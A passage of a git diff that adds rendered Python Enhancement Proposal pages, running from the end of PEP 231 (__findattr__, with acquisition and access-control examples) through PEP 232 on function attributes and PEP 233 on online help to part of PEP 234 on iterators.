A second, more elaborate example is the implementation of both +implicit and explicit acquisition in pure Python:

+
import types
+
+class MethodWrapper:
+    def __init__(self, container, method):
+        self.__container = container
+        self.__method = method
+
+    def __call__(self, *args, **kws):
+        return self.__method.im_func(self.__container, *args, **kws)
+
+
+class WrapperImplicit:
+    def __init__(self, contained, container):
+        self.__contained = contained
+        self.__container = container
+
+    def __repr__(self):
+        return '<Wrapper: [%s | %s]>' % (self.__container,
+                                         self.__contained)
+
+    def __findattr__(self, name, *args):
+        # Some things are our own
+        if name.startswith('_WrapperImplicit__'):
+            if args: return setattr(self, name, *args)
+            else:    return getattr(self, name)
+        # setattr stores the name on the contained object directly
+        if args:
+            return setattr(self.__contained, name, args[0])
+        # Other special names
+        if name == 'aq_parent':
+            return self.__container
+        elif name == 'aq_self':
+            return self.__contained
+        elif name == 'aq_base':
+            base = self.__contained
+            try:
+                while 1:
+                    base = base.aq_self
+            except AttributeError:
+                return base
+        # no acquisition for _ names
+        if name.startswith('_'):
+            return getattr(self.__contained, name)
+        # Everything else gets wrapped
+        missing = []
+        which = self.__contained
+        obj = getattr(which, name, missing)
+        if obj is missing:
+            which = self.__container
+            obj = getattr(which, name, missing)
+            if obj is missing:
+                raise AttributeError, name
+        of = getattr(obj, '__of__', missing)
+        if of is not missing:
+            return of(self)
+        elif type(obj) == types.MethodType:
+            return MethodWrapper(self, obj)
+        return obj
+
+
+class WrapperExplicit:
+    def __init__(self, contained, container):
+        self.__contained = contained
+        self.__container = container
+
+    def __repr__(self):
+        return '<Wrapper: [%s | %s]>' % (self.__container,
+                                         self.__contained)
+
+    def __findattr__(self, name, *args):
+        # Some things are our own
+        if name.startswith('_WrapperExplicit__'):
+            if args: return setattr(self, name, *args)
+            else:    return getattr(self, name)
+        # setattr stores the name on the contained object directly
+        if args:
+            return setattr(self.__contained, name, args[0])
+        # Other special names
+        if name == 'aq_parent':
+            return self.__container
+        elif name == 'aq_self':
+            return self.__contained
+        elif name == 'aq_base':
+            base = self.__contained
+            try:
+                while 1:
+                    base = base.aq_self
+            except AttributeError:
+                return base
+        elif name == 'aq_acquire':
+            return self.aq_acquire
+        # explicit acquisition only
+        obj = getattr(self.__contained, name)
+        if type(obj) == types.MethodType:
+            return MethodWrapper(self, obj)
+        return obj
+
+    def aq_acquire(self, name):
+        # Everything else gets wrapped
+        missing = []
+        which = self.__contained
+        obj = getattr(which, name, missing)
+        if obj is missing:
+            which = self.__container
+            obj = getattr(which, name, missing)
+            if obj is missing:
+                raise AttributeError, name
+        of = getattr(obj, '__of__', missing)
+        if of is not missing:
+            return of(self)
+        elif type(obj) == types.MethodType:
+            return MethodWrapper(self, obj)
+        return obj
+
+
+class Implicit:
+    def __of__(self, container):
+        return WrapperImplicit(self, container)
+
+    def __findattr__(self, name, *args):
+        # ignore setattrs
+        if args:
+            return setattr(self, name, args[0])
+        obj = getattr(self, name)
+        missing = []
+        of = getattr(obj, '__of__', missing)
+        if of is not missing:
+            return of(self)
+        return obj
+
+
+class Explicit(Implicit):
+    def __of__(self, container):
+        return WrapperExplicit(self, container)
+
+
+# tests
+class C(Implicit):
+    color = 'red'
+
+class A(Implicit):
+    def report(self):
+        return self.color
+
+# simple implicit acquisition
+c = C()
+a = A()
+c.a = a
+assert c.a.report() == 'red'
+
+d = C()
+d.color = 'green'
+d.a = a
+assert d.a.report() == 'green'
+
+try:
+    a.report()
+except AttributeError:
+    pass
+else:
+    assert 0, 'AttributeError expected'
+
+
+# special names
+assert c.a.aq_parent is c
+assert c.a.aq_self is a
+
+c.a.d = d
+assert c.a.d.aq_base is d
+assert c.a is not a
+
+
+# no acquisition on _ names
+class E(Implicit):
+    _color = 'purple'
+
+class F(Implicit):
+    def report(self):
+        return self._color
+
+e = E()
+f = F()
+e.f = f
+try:
+    e.f.report()
+except AttributeError:
+    pass
+else:
+    assert 0, 'AttributeError expected'
+
+
+# explicit
+class G(Explicit):
+    color = 'pink'
+
+class H(Explicit):
+    def report(self):
+        return self.aq_acquire('color')
+
+    def barf(self):
+        return self.color
+
+g = G()
+h = H()
+g.h = h
+assert g.h.report() == 'pink'
+
+i = G()
+i.color = 'cyan'
+i.h = h
+assert i.h.report() == 'cyan'
+
+try:
+    g.h.barf()
+except AttributeError:
+    pass
+else:
+    assert 0, 'AttributeError expected'
+
+
+

C++-like access control can also be accomplished, although less +cleanly because of the difficulty of figuring out what method is +being called from the runtime call stack:

+
import sys
+import types
+
+PUBLIC = 0
+PROTECTED = 1
+PRIVATE = 2
+
+try:
+    getframe = sys._getframe
+except AttributeError:
+    def getframe(n):
+        try: raise Exception
+        except Exception:
+            frame = sys.exc_info()[2].tb_frame
+        while n > 0:
+            frame = frame.f_back
+            n = n - 1
+            if frame is None:
+                raise ValueError, 'call stack is not deep enough'
+        return frame
+
+
+class AccessViolation(Exception):
+    pass
+
+
+class Access:
+    def __findattr__(self, name, *args):
+        methcache = self.__dict__.setdefault('__cache__', {})
+        missing = []
+        obj = getattr(self, name, missing)
+        # if obj is missing we better be doing a setattr for
+        # the first time
+        if obj is not missing and type(obj) == types.MethodType:
+            # Disgusting hack because there's no way to
+            # dynamically figure out what the method being
+            # called is from the stack frame.
+            methcache[obj.im_func.func_code] = obj.im_class
+        #
+        # What's the access permissions for this name?
+        access, klass = getattr(self, '__access__', {}).get(
+            name, (PUBLIC, 0))
+        if access is not PUBLIC:
+            # Now try to see which method is calling us
+            frame = getframe(0).f_back
+            if frame is None:
+                raise AccessViolation
+            # Get the class of the method that's accessing
+            # this attribute, by using the code object cache
+            if frame.f_code.co_name == '__init__':
+                # There aren't entries in the cache for ctors,
+                # because the calling mechanism doesn't go
+                # through __findattr__().  Are there other
+                # methods that might have the same behavior?
+                # Since we can't know who's __init__ we're in,
+                # for now we'll assume that only protected and
+                # public attrs can be accessed.
+                if access is PRIVATE:
+                    raise AccessViolation
+            else:
+                methclass = self.__cache__.get(frame.f_code)
+                if not methclass:
+                    raise AccessViolation
+                if access is PRIVATE and methclass is not klass:
+                    raise AccessViolation
+                if access is PROTECTED and not issubclass(methclass,
+                                                          klass):
+                    raise AccessViolation
+        # If we got here, it must be okay to access the attribute
+        if args:
+            return setattr(self, name, *args)
+        return obj
+
+# tests
+class A(Access):
+    def __init__(self, foo=0, name='A'):
+        self._foo = foo
+        # can't set private names in __init__
+        self.__initprivate(name)
+
+    def __initprivate(self, name):
+        self._name = name
+
+    def getfoo(self):
+        return self._foo
+
+    def setfoo(self, newfoo):
+        self._foo = newfoo
+
+    def getname(self):
+        return self._name
+
+A.__access__ = {'_foo'      : (PROTECTED, A),
+                '_name'     : (PRIVATE, A),
+                '__dict__'  : (PRIVATE, A),
+                '__access__': (PRIVATE, A),
+                }
+
+class B(A):
+    def setfoo(self, newfoo):
+        self._foo = newfoo + 3
+
+    def setname(self, name):
+        self._name = name
+
+b = B(1)
+b.getfoo()
+
+a = A(1)
+assert a.getfoo() == 1
+a.setfoo(2)
+assert a.getfoo() == 2
+
+try:
+    a._foo
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+try:
+    a._foo = 3
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+try:
+    a.__dict__['_foo']
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+
+b = B()
+assert b.getfoo() == 0
+b.setfoo(2)
+assert b.getfoo() == 5
+try:
+    b.setname('B')
+except AccessViolation:
+    pass
+else:
+    assert 0, 'AccessViolation expected'
+
+assert b.getname() == 'A'
+
+
+

Here’s an implementation of the attribute hook described in PEP +213 (except that hooking on attribute deletion isn’t supported by +the current reference implementation).

+
class Pep213:
+    def __findattr__(self, name, *args):
+        hookname = '__attr_%s__' % name
+        if args:
+            op = 'set'
+        else:
+            op = 'get'
+        # XXX: op = 'del' currently not supported
+        missing = []
+        meth = getattr(self, hookname, missing)
+        if meth is missing:
+            if op == 'set':
+                return setattr(self, name, *args)
+            else:
+                return getattr(self, name)
+        else:
+            return meth(op, *args)
+
+
+def computation(i):
+    print 'doing computation:', i
+    return i + 3
+
+
+def rev_computation(i):
+    print 'doing rev_computation:', i
+    return i - 3
+
+
+class X(Pep213):
+    def __init__(self, foo=0):
+        self.__foo = foo
+
+    def __attr_foo__(self, op, val=None):
+        if op == 'get':
+            return computation(self.__foo)
+        elif op == 'set':
+            self.__foo = rev_computation(val)
+        # XXX: 'del' not yet supported
+
+x = X()
+fooval = x.foo
+print fooval
+x.foo = fooval + 5
+print x.foo
+# del x.foo
+
+
+
+
+

Reference Implementation

+

The reference implementation, as a patch to the Python core, can be +found at this URL:

+

http://sourceforge.net/patch/?func=detailpatch&patch_id=102613&group_id=5470

+
+
+

References

+ + +
+
+

Rejection

+

There are serious problems with the recursion-protection feature. +As described here it’s not thread-safe, and a thread-safe solution +has other problems. In general, it’s not clear how helpful the +recursion-protection feature is; it makes it hard to write code +that needs to be callable inside __findattr__ as well as outside +it. But without the recursion-protection, it’s hard to implement +__findattr__ at all (since __findattr__ would invoke itself +recursively for every attribute it tries to access). There seems +to be no good solution here.

+

It’s also dubious how useful it is to support __findattr__ both +for getting and for setting attributes – __setattr__ gets called +in all cases already.

+

The examples can all be implemented using __getattr__ if care is +taken not to store instance variables under their own names.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0231.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0232/index.html b/pep-0232/index.html new file mode 100644 index 00000000000..77b80c63b69 --- /dev/null +++ b/pep-0232/index.html @@ -0,0 +1,364 @@ PEP 232 – Function Attributes | peps.python.org
+
+

+
+
+

PEP 232 – Function Attributes

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
02-Dec-2000
+
Python-Version:
+
2.1
+
Post-History:
+
20-Feb-2001
+
+
+
+
+
+

Introduction

+

This PEP describes an extension to Python, adding attribute +dictionaries to functions and methods. This PEP tracks the status +and ownership of this feature. It contains a description of the +feature and outlines changes necessary to support the feature. +This PEP summarizes discussions held in mailing list forums, and +provides URLs for further information, where appropriate. The CVS +revision history of this file contains the definitive historical +record.

+
+
+

Background

+

Functions already have a number of attributes, some of which are +writable, e.g. func_doc, a.k.a. func.__doc__. func_doc +has the interesting property that there is special syntax in +function (and method) definitions for implicitly setting the +attribute. This convenience has been exploited over and over again, +overloading docstrings with additional semantics.

+

For example, John Aycock has written a system where docstrings are +used to define parsing rules. [1] Zope’s ZPublisher ORB [2] uses +docstrings to signal publishable methods, i.e. methods that can +be called through the web.

+

The problem with this approach is that the overloaded semantics may conflict with each other. A conflict would arise, for example, if we wanted to add a doctest unit test to a Zope method that should not be publishable through the web.

+
+
+

Proposal

+

This proposal adds a new dictionary to function objects, called func_dict (a.k.a. __dict__). This dictionary can be set and retrieved using ordinary attribute set and get syntax.

+

Methods also gain getter syntax, and they currently access the +attribute through the dictionary of the underlying function +object. It is not possible to set attributes on bound or unbound +methods, except by doing so explicitly on the underlying function +object. See the Future Directions discussion below for +approaches in subsequent versions of Python.

+

A function object’s __dict__ can also be set, but only to a dictionary object. Deleting a function’s __dict__, or setting it to anything other than a concrete dictionary object, results in a TypeError. If no function attributes have ever been set, the function’s __dict__ will be empty.
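As a sketch of these rules (illustrative only; the function f here is invented for the example):

+
def f():
+    pass
+
+f.__dict__ = {'publish': 1}       # fine: a concrete dictionary
+assert f.publish == 1
+
+try:
+    f.__dict__ = [1, 2, 3]        # not a dictionary object
+except TypeError:
+    pass
+
+try:
+    del f.__dict__                # deletion also raises TypeError
+except TypeError:
+    pass
+
+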

+
+
+

Examples

+

Here are some examples of what you can do with this feature.

+
def a():
+    pass
+
+a.publish = 1
+a.unittest = '''...'''
+
+if a.publish:
+    print a()
+
+if hasattr(a, 'unittest'):
+    testframework.execute(a.unittest)
+
+class C:
+    def a(self):
+        'just a docstring'
+        a.publish = 1
+
+c = C()
+if c.a.publish:
+    publish(c.a())
+
+
+
+

Other Uses

+

Paul Prescod enumerated a bunch of other uses on the python-dev thread.

+
+
+
+

Future Directions

+

Here are a number of future directions to consider. Any adoption +of these ideas would require a new PEP, which referenced this one, +and would have to be targeted at a Python version subsequent to +the 2.1 release.

+
    +
  • A previous version of this PEP allowed for both setter and +getter of attributes on unbound methods, and only getter on +bound methods. A number of problems were discovered with this +policy.

    Because method attributes were stored in the underlying +function, this caused several potentially surprising results:

    +
    class C:
    +    def a(self): pass
    +
    +c1 = C()
    +c2 = C()
    +c1.a.publish = 1
    +# c2.a.publish would now be == 1 also!
    +
    +
    +

Because a change to the method a bound to c1 also caused a change to a bound to c2, setting of attributes on bound methods was disallowed. However, even allowing setting of attributes on unbound methods has its ambiguities:

    +
    class D(C): pass
    +class E(C): pass
    +
    +D.a.publish = 1
    +# E.a.publish would now be == 1 also!
    +
    +
    +

    For this reason, the current PEP disallows setting attributes on +either bound or unbound methods, but does allow for getting +attributes on either – both return the attribute value on the +underlying function object.

    +

    A future PEP might propose to implement setting (bound or +unbound) method attributes by setting attributes on the instance +or class, using special naming conventions. I.e.:

    +
    class C:
    +    def a(self): pass
    +
    +C.a.publish = 1
    +C.__a_publish__ == 1 # true
    +
    +c = C()
    +c.a.publish = 2
    +c.__a_publish__ == 2 # true
    +
    +d = C()
    +d.__a_publish__ == 1 # true
    +
    +
    +

    Here, a lookup on the instance would look to the instance’s +dictionary first, followed by a lookup on the class’s +dictionary, and finally a lookup on the function object’s +dictionary.

    +
  • +
  • Currently, Python supports function attributes only on Python +functions (i.e. those that are written in Python, not those that +are built-in). Should it be worthwhile, a separate patch can be +crafted that will add function attributes to built-ins.
  • +
  • __doc__ is the only function attribute that currently has +syntactic support for conveniently setting. It may be +worthwhile to eventually enhance the language for supporting +easy function attribute setting. Here are some syntaxes +suggested by PEP reviewers: [3]
    def a {
    +    'publish' : 1,
    +    'unittest': '''...''',
    +    }
    +    (args):
    +    # ...
    +
    +def a(args):
    +    """The usual docstring."""
    +    {'publish' : 1,
    +     'unittest': '''...''',
    +     # etc.
    +     }
    +
    +def a(args) having (publish = 1):
    +    # see reference [3]
    +    pass
    +
    +
    +

    The BDFL is currently against any such special syntactic support +for setting arbitrary function attributes. Any syntax proposals +would have to be outlined in new PEPs.

    +
  • +
+
+
+

Dissenting Opinion

+

When this was discussed on the python-dev mailing list in April +2000, a number of dissenting opinions were voiced. For +completeness, the discussion thread starts on python-dev.

+

The dissenting arguments appear to fall under the following +categories:

+
    +
  • no clear purpose (what does it buy you?)
  • +
  • other ways to do it (e.g. mappings as class attributes)
  • +
  • useless until syntactic support is included
  • +
+

Countering some of these arguments is the observation that with vanilla Python 2.0, __doc__ can in fact be set to any type of object, so some semblance of writable function attributes is already feasible. But that approach is yet another corruption of __doc__.

+

And while it is of course possible to add mappings to class +objects (or in the case of function attributes, to the function’s +module), it is more difficult and less obvious how to extract the +attribute values for inspection.

+

Finally, it may be desirable to add syntactic support, much the +same way that __doc__ syntactic support exists. This can be +considered separately from the ability to actually set and get +function attributes.

+
+
+

Reference Implementation

+

This PEP has been accepted and the implementation has been +integrated into Python 2.1.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0232.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0233/index.html b/pep-0233/index.html new file mode 100644 index 00000000000..ba4c12e5623 --- /dev/null +++ b/pep-0233/index.html @@ -0,0 +1,207 @@ PEP 233 – Python Online Help | peps.python.org
+
+

+
+
+

PEP 233 – Python Online Help

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
11-Dec-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP describes a command-line driven online help facility for +Python. The facility should be able to build on existing +documentation facilities such as the Python documentation and +docstrings. It should also be extensible for new types and +modules.

+
+
+

Interactive use

+

Simply typing help describes the help function (through repr() +overloading).

+

help can also be used as a function.

+

The function takes the following forms of input:

+
    +
  • help( "string" ) – built-in topic or global
  • +
  • help( <ob> ) – docstring from object or type
  • +
  • help( "doc:filename" ) – filename from Python documentation
  • +
+

If you ask for a global, it can be a fully-qualified name, such as:

+
help("xml.dom")
+
+
+

You can also use the facility from a command-line:

+
python --help if
+
+
+

In either situation, the output does paging similar to the more +command.

+
+
+

Implementation

+

The help function is implemented in an onlinehelp module which is +demand-loaded.

+

There should be options for fetching help information from +environments other than the command line through the onlinehelp +module:

+
onlinehelp.gethelp(object_or_string) -> string
+
+
+

It should also be possible to override the help display function +by assigning to onlinehelp.displayhelp(object_or_string).

+

The module should be able to extract module information from +either the HTML or LaTeX versions of the Python documentation. +Links should be accommodated in a “lynx-like” manner.

+

Over time, it should also be able to recognize when docstrings are +in “special” syntaxes like structured text, HTML and LaTeX and +decode them appropriately.

+

A prototype implementation is available with the Python source +distribution as nondist/sandbox/doctools/onlinehelp.py.
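A rough sketch of the interface described above (hypothetical code, not the actual prototype; topic lookup and paging are stubbed out):

+
import sys
+
+def gethelp(object_or_string):
+    # A topic string would be resolved against built-in topics,
+    # globals, or "doc:filename" entries; stubbed out here.
+    if isinstance(object_or_string, str):
+        return 'no documentation found for %r' % (object_or_string,)
+    doc = getattr(object_or_string, '__doc__', None)
+    return doc or '(no docstring)'
+
+def displayhelp(object_or_string):
+    # Callers may override this by assigning to
+    # onlinehelp.displayhelp; a real version would page the output.
+    sys.stdout.write(gethelp(object_or_string) + '\n')
+
+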

+
+
+

Built-in Topics

+
    +
  • help( "intro" ) – What is Python? Read this first!
  • +
  • help( "keywords" ) – What are the keywords?
  • +
  • help( "syntax" ) – What is the overall syntax?
  • +
  • help( "operators" ) – What operators are available?
  • +
  • help( "builtins" ) – What functions, types, etc. are built-in?
  • +
  • help( "modules" ) – What modules are in the standard library?
  • +
  • help( "copyright" ) – Who owns Python?
  • +
  • help( "moreinfo" ) – Where is there more information?
  • +
  • help( "changes" ) – What changed in Python 2.0?
  • +
  • help( "extensions" ) – What extensions are installed?
  • +
  • help( "faq" ) – What questions are frequently asked?
  • +
  • help( "ack" ) – Who has done work on Python lately?
  • +
+
+
+

Security Issues

+

This module will attempt to import modules with the same names as +requested topics. Don’t use the modules if you are not confident +that everything in your PYTHONPATH is from a trusted source.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0233.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0234/index.html b/pep-0234/index.html new file mode 100644 index 00000000000..7ed56123ce7 --- /dev/null +++ b/pep-0234/index.html @@ -0,0 +1,531 @@ PEP 234 – Iterators | peps.python.org
+
+

+
+
+

PEP 234 – Iterators

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jan-2001
+
Python-Version:
+
2.1
+
Post-History:
+
30-Apr-2001
+
+
+
+
+
+

Abstract

+

This document proposes an iteration interface that objects can provide to +control the behaviour of for loops. Looping is customized by providing a +method that produces an iterator object. The iterator provides a get next +value operation that produces the next item in the sequence each time it is +called, raising an exception when no more items are available.

+

In addition, specific iterators over the keys of a dictionary and over the +lines of a file are proposed, and a proposal is made to allow spelling +dict.has_key(key) as key in dict.

+

Note: this is an almost complete rewrite of this PEP by the second author, +describing the actual implementation checked into the trunk of the Python 2.2 +CVS tree. It is still open for discussion. Some of the more esoteric +proposals in the original version of this PEP have been withdrawn for now; +these may be the subject of a separate PEP in the future.

+
+
+

C API Specification

+

A new exception is defined, StopIteration, which can be used to signal the +end of an iteration.

+

A new slot named tp_iter for requesting an iterator is added to the type +object structure. This should be a function of one PyObject * argument +returning a PyObject *, or NULL. To use this slot, a new C API +function PyObject_GetIter() is added, with the same signature as the +tp_iter slot function.

+

Another new slot, named tp_iternext, is added to the type structure, for +obtaining the next value in the iteration. To use this slot, a new C API +function PyIter_Next() is added. The signature for both the slot and the +API function is as follows, although the NULL return conditions differ: +the argument is a PyObject * and so is the return value. When the return +value is non-NULL, it is the next value in the iteration. When it is +NULL, then for the tp_iternext slot there are three possibilities:

+
    +
  • No exception is set; this implies the end of the iteration.
  • +
  • The StopIteration exception (or a derived exception class) is set; this +implies the end of the iteration.
  • +
  • Some other exception is set; this means that an error occurred that should be +propagated normally.
  • +
+

The higher-level PyIter_Next() function clears the StopIteration +exception (or derived exception) when it occurs, so its NULL return +conditions are simpler:

+
    +
  • No exception is set; this means iteration has ended.
  • +
  • Some exception is set; this means an error occurred, and should be propagated +normally.
  • +
+

Iterators implemented in C should not implement a next() method with semantics similar to the tp_iternext slot! When the type’s dictionary is initialized (by PyType_Ready()), the presence of a tp_iternext slot causes a method next() wrapping that slot to be added to the type’s tp_dict. (Exception: if the type doesn’t use PyObject_GenericGetAttr() to access instance attributes, the next() method in the type’s tp_dict may not be seen.) (Due to a misunderstanding in the original text of this PEP, in Python 2.2, all iterator types implemented a next() method that was overridden by the wrapper; this has been fixed in Python 2.3.)

+

To ensure binary backwards compatibility, a new flag Py_TPFLAGS_HAVE_ITER +is added to the set of flags in the tp_flags field, and to the default +flags macro. This flag must be tested before accessing the tp_iter or +tp_iternext slots. The macro PyIter_Check() tests whether an object +has the appropriate flag set and has a non-NULL tp_iternext slot. +There is no such macro for the tp_iter slot (since the only place where +this slot is referenced should be PyObject_GetIter(), and this can check +for the Py_TPFLAGS_HAVE_ITER flag directly).

+

(Note: the tp_iter slot can be present on any object; the tp_iternext +slot should only be present on objects that act as iterators.)

+

For backwards compatibility, the PyObject_GetIter() function implements +fallback semantics when its argument is a sequence that does not implement a +tp_iter function: a lightweight sequence iterator object is constructed in +that case which iterates over the items of the sequence in the natural order.

+

The Python bytecode generated for for loops is changed to use new opcodes, +GET_ITER and FOR_ITER, that use the iterator protocol rather than the +sequence protocol to get the next value for the loop variable. This makes it +possible to use a for loop to loop over non-sequence objects that support +the tp_iter slot. Other places where the interpreter loops over the values +of a sequence should also be changed to use iterators.
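In Python terms, the new opcodes make a for loop behave roughly like this hand-expanded sketch of the protocol (not the actual bytecode):

+
obj = [1, 2, 3]
+
+# roughly what "for x in obj: print x" does under the new protocol
+it = iter(obj)
+while 1:
+    try:
+        x = it.next()
+    except StopIteration:
+        break
+    print x
+
+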

+

Iterators ought to implement the tp_iter slot as returning a reference to +themselves; this is needed to make it possible to use an iterator (as opposed +to a sequence) in a for loop.

+

Iterator implementations (in C or in Python) should guarantee that once the +iterator has signalled its exhaustion, subsequent calls to tp_iternext or +to the next() method will continue to do so. It is not specified whether +an iterator should enter the exhausted state when an exception (other than +StopIteration) is raised. Note that Python cannot guarantee that +user-defined or 3rd party iterators implement this requirement correctly.

+
+
+

Python API Specification

+

The StopIteration exception is made visible as one of the standard +exceptions. It is derived from Exception.

+

A new built-in function is defined, iter(), which can be called in two +ways:

+
    +
  • iter(obj) calls PyObject_GetIter(obj).
  • +
  • iter(callable, sentinel) returns a special kind of iterator that calls the callable to produce a new value, and compares the return value to the sentinel value. If the return value equals the sentinel, this signals the end of the iteration and StopIteration is raised rather than returning normally; if the return value does not equal the sentinel, it is returned as the next value from the iterator. If the callable raises an exception, this is propagated normally; in particular, the function is allowed to raise StopIteration as an alternative way to end the iteration. (This functionality is available from the C API as PyCallIter_New(callable, sentinel).)
  • +
+

Iterator objects returned by either form of iter() have a next() +method. This method either returns the next value in the iteration, or raises +StopIteration (or a derived exception class) to signal the end of the +iteration. Any other exception should be considered to signify an error and +should be propagated normally, not taken to mean the end of the iteration.

+

Classes can define how they are iterated over by defining an __iter__() +method; this should take no additional arguments and return a valid iterator +object. A class that wants to be an iterator should implement two methods: a +next() method that behaves as described above, and an __iter__() method +that returns self.

+

The two methods correspond to two distinct protocols:

+
    +
  1. An object can be iterated over with for if it implements __iter__() +or __getitem__().
  2. +
  3. An object can function as an iterator if it implements next().
  4. +
+

Container-like objects usually support protocol 1. Iterators are currently +required to support both protocols. The semantics of iteration come only from +protocol 2; protocol 1 is present to make iterators behave like sequences; in +particular so that code receiving an iterator can use a for-loop over the +iterator.
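As a sketch, here is a class obeying both protocols at once, plus the sentinel form of iter() described above (the CountDown class is invented for the example):

+
class CountDown:
+    def __init__(self, n):
+        self.n = n
+    def __iter__(self):
+        # protocol 1: hand out an iterator; an iterator returns itself
+        return self
+    def next(self):
+        # protocol 2: produce values, then raise StopIteration --
+        # and keep raising it on subsequent calls
+        if self.n <= 0:
+            raise StopIteration
+        self.n = self.n - 1
+        return self.n
+
+for i in CountDown(3):
+    print i            # prints 2, 1, 0
+
+# the two-argument form: call readline() until "" is returned
+import StringIO
+f = StringIO.StringIO('one\ntwo\n')
+for line in iter(f.readline, ''):
+    print line,
+
+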

+
+
+

Dictionary Iterators

+
    +
  • Dictionaries implement a sq_contains slot that implements the same test +as the has_key() method. This means that we can write
    if k in dict: ...
    +
    +
    +

    which is equivalent to

    +
    if dict.has_key(k): ...
    +
    +
    +
  • +
  • Dictionaries implement a tp_iter slot that returns an efficient iterator +that iterates over the keys of the dictionary. During such an iteration, the +dictionary should not be modified, except that setting the value for an +existing key is allowed (deletions or additions are not, nor is the +update() method). This means that we can write
    for k in dict: ...
    +
    +
    +

    which is equivalent to, but much faster than

    +
    for k in dict.keys(): ...
    +
    +
    +

    as long as the restriction on modifications to the dictionary (either by the +loop or by another thread) are not violated.

    +
  • +
  • Add methods to dictionaries that return different kinds of iterators +explicitly:
    for key in dict.iterkeys(): ...
    +
    +for value in dict.itervalues(): ...
    +
    +for key, value in dict.iteritems(): ...
    +
    +
    +

    This means that for x in dict is shorthand for +for x in dict.iterkeys().

    +
  • +
+

Other mappings, if they support iterators at all, should also iterate over the +keys. However, this should not be taken as an absolute rule; specific +applications may have different requirements.

+
+
+

File Iterators

+

The following proposal is useful because it provides us with a good answer to +the complaint that the common idiom to iterate over the lines of a file is ugly +and slow.

+
    +
  • Files implement a tp_iter slot that is equivalent to +iter(f.readline, ""). This means that we can write
    for line in file:
    +    ...
    +
    +
    +

    as a shorthand for

    +
    for line in iter(file.readline, ""):
    +    ...
    +
    +
    +

    which is equivalent to, but faster than

    +
    while 1:
    +    line = file.readline()
    +    if not line:
    +        break
    +    ...
    +
    +
    +
  • +
+

This also shows that some iterators are destructive: they consume all the +values and a second iterator cannot easily be created that iterates +independently over the same values. You could open the file for a second time, +or seek() to the beginning, but these solutions don’t work for all file +types, e.g. they don’t work when the open file object really represents a pipe +or a stream socket.

+

Because the file iterator uses an internal buffer, mixing this with other file +operations (e.g. file.readline()) doesn’t work right. Also, the following +code:

+
for line in file:
+    if line == "\n":
+        break
+for line in file:
+   print line,
+
+
+

doesn’t work as you might expect, because the iterator created by the second +for-loop doesn’t take the buffer read-ahead by the first for-loop into account. +A correct way to write this is:

+
it = iter(file)
+for line in it:
+    if line == "\n":
+        break
+for line in it:
+    print line,
+
+
+

(The rationale for these restrictions is that for line in file ought to become the recommended, standard way to iterate over the lines of a file, and this should be as fast as can be. The iterator version is considerably faster than calling readline(), due to the internal buffer in the iterator.)

+
+
+

Rationale

+

If all the parts of the proposal are included, this addresses many concerns in +a consistent and flexible fashion. Among its chief virtues are the following +four – no, five – no, six – points:

+
    +
  1. It provides an extensible iterator interface.
  2. +
  3. It allows performance enhancements to list iteration.
  4. +
  5. It allows big performance enhancements to dictionary iteration.
  6. +
  7. It allows one to provide an interface for just iteration without pretending +to provide random access to elements.
  8. +
  9. It is backward-compatible with all existing user-defined classes and +extension objects that emulate sequences and mappings, even mappings that +only implement a subset of {__getitem__, keys, values, +items}.
  10. +
  11. It makes code iterating over non-sequence collections more concise and +readable.
  12. +
+
+
+

Resolved Issues

+

The following topics have been decided by consensus or BDFL pronouncement.

+
    +
  • Two alternative spellings for next() have been proposed but rejected: +__next__(), because it corresponds to a type object slot +(tp_iternext); and __call__(), because this is the only operation.

    Arguments against __next__(): while many iterators are used in for loops, +it is expected that user code will also call next() directly, so having +to write __next__() is ugly; also, a possible extension of the protocol +would be to allow for prev(), current() and reset() operations; +surely we don’t want to use __prev__(), __current__(), +__reset__().

    +

    Arguments against __call__() (the original proposal): taken out of +context, x() is not very readable, while x.next() is clear; there’s a +danger that every special-purpose object wants to use __call__() for its +most common operation, causing more confusion than clarity.

    +

    (In retrospect, it might have been better to go for __next__() and have a +new built-in, next(it), which calls it.__next__(). But alas, it’s too +late; this has been deployed in Python 2.2 since December 2001.)

    +
  • +
  • Some folks have requested the ability to restart an iterator. This should be +dealt with by calling iter() on a sequence repeatedly, not by the +iterator protocol itself. (See also requested extensions below.)
  • +
  • It has been questioned whether an exception to signal the end of the +iteration isn’t too expensive. Several alternatives for the +StopIteration exception have been proposed: a special value End to +signal the end, a function end() to test whether the iterator is +finished, even reusing the IndexError exception.
      +
    • A special value has the problem that if a sequence ever contains that +special value, a loop over that sequence will end prematurely without any +warning. If the experience with null-terminated C strings hasn’t taught us +the problems this can cause, imagine the trouble a Python introspection +tool would have iterating over a list of all built-in names, assuming that +the special End value was a built-in name!
    • +
    • Calling an end() function would require two calls per iteration. Two +calls is much more expensive than one call plus a test for an exception. +Especially the time-critical for loop can test very cheaply for an +exception.
    • +
    • Reusing IndexError can cause confusion because it can be a genuine +error, which would be masked by ending the loop prematurely.
    • +
    +
  • +
  • Some have asked for a standard iterator type. Presumably all iterators would +have to be derived from this type. But this is not the Python way: +dictionaries are mappings because they support __getitem__() and a +handful other operations, not because they are derived from an abstract +mapping type.
  • +
